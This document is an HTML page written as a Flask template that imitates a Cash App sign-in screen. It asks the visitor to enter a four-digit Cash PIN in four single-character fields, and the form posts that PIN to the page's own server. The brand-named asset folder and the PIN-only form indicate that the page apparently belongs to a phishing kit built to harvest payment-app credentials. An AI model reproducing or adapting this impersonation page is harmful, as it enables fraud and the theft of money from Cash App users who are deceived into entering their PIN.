<!DOCTYPE html>
<html lang="en">
<head>
          <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>
<link type="text/css" rel="stylesheet" href="{{url_for('static', filename='cashapp/css/style.css')}}"/>

  <meta charset="UTF-8">
  <title>Cash App - Sign in to your account</title>

    <style>
input.pin{
width: 32px;
height: 32px;
border-color: white;
outline: none;
border-width: 3px;
font-family: myFirstFont;
color: white;
font-size: 20px;
border-style: solid;
border-radius: 32px;
text-align: center;
background-color: #0bb634;
margin: 26px;
}
    </style>

</head>
<body>

<form action="#" method="post" id="cashapplogin">
<center><h2>Welcome back,</h2></center>
<center><h2>Enter your Cash PIN to continue.</h2></center>
<br>
<center><input class="pin" id='ist' name='ist' required maxlength="1" onkeyup="clickEvent(this,'sec')"><input class="pin" id="sec"  name="sec" required maxlength="1" onkeyup="clickEvent(this,'third')"><input class="pin" id="third"  name="third" required maxlength="1" onkeyup="clickEvent(this,'fourth')"><input class="pin" id="fourth"  name="fourth" required maxlength="1">
<br><br>
<div class="show"><button class="submit" type="submit">Sign in</button></div><div class="hide"><button class="submit" type="submit"><center><div class="lds-ring"><div></div><div></div><div></div><div></div></div></center></button></div>

</center>
</form>

   <script>

var loc = window.location.href+'';
if (loc.indexOf('http://')==0){
    window.location.href = loc.replace('http://','https://');
}
   </script>
<script>
$(".hide").hide();
$("#cashapplogin").on("submit", function(){
     $(".hide").show();
     $(".show").hide();
});

</script>
         <script>
            function clickEvent(first,last){
			if(first.value.length){
				document.getElementById(last).focus();
			}
		}
         </script>
</body>
</html>